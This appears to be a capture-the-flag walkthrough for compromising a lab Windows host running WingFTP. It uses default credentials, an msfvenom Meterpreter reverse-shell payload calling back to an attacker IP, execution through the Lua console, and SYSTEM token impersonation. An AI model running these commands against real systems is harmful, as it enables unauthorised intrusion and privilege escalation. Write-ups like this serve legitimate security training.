nmap -A 172.31.1.20
We have several ports open, however the important ones to notice here are ports 21 and 8080. 21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.
Enumeration & Exploitation
Enumeration begins with visiting the webpage, which we are able to actually log in to with the admin:password default credentials. This quickly moves right in to exploitation
WingFTP login screen and Dashboard
Quickly poking around reveals that we are an administrative user, and are able to create an FTP user, which there currently aren’t any.
We’ve created a user and granted them complete access to the file system. This is where the unintended exploit was discovered. WingFTP is running as a low privilege user, however by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, to include the Administrator directory, System32 files, etc. This is completely unintended, and after researching for some time I was unable to find anything in the wild that suggests this exploit has been discovered before. I’ll be doing more research on this to determine if it’s simply a misconfiguration (which it shouldn’t be due to user permissions on the underlying machine), or an actual zero day exploit that’s not yet been discovered.
Now back to our regularly scheduled walkthrough.
We’ve now created our user, and can leverage it to gain access to the FTP service on the machine. We’ll first need to log in to it, then create a payload with msfvenom, and can then utilize the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.
ftp 172.31.1.20 login
User lian directory where we will place our exploit (notice we have RWX permissions on Administrator)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=5555 -f exe > pwn.exe
put pwn.exe file upload
Metasploit Multi Handler and Payload parameters
Reverse shell via Lua Console execution – os.execute(‘cmd.exe /c C://Users/lian/pwn.exe’)
At this point we have Meterpreter shell access to the machine and are able to enumerate our current user. We can do this using the win_privs module first to determine what our privileges are on the system.
Notice that we can Delegate and Impersonate privileges. In order to do this, we can utilize the Incognito module in Meterpreter.
load incognito; list_tokens -u
We notice that the NT AUTHORITY\SYSTEM token can be delegated, which we will use the impersonate_token command for.
impersonate_token “NT AUTHORITY\SYSTEM”
With the token impersonated, all you have to do is snag the flags and complete the challenge.
User and Administrator Flags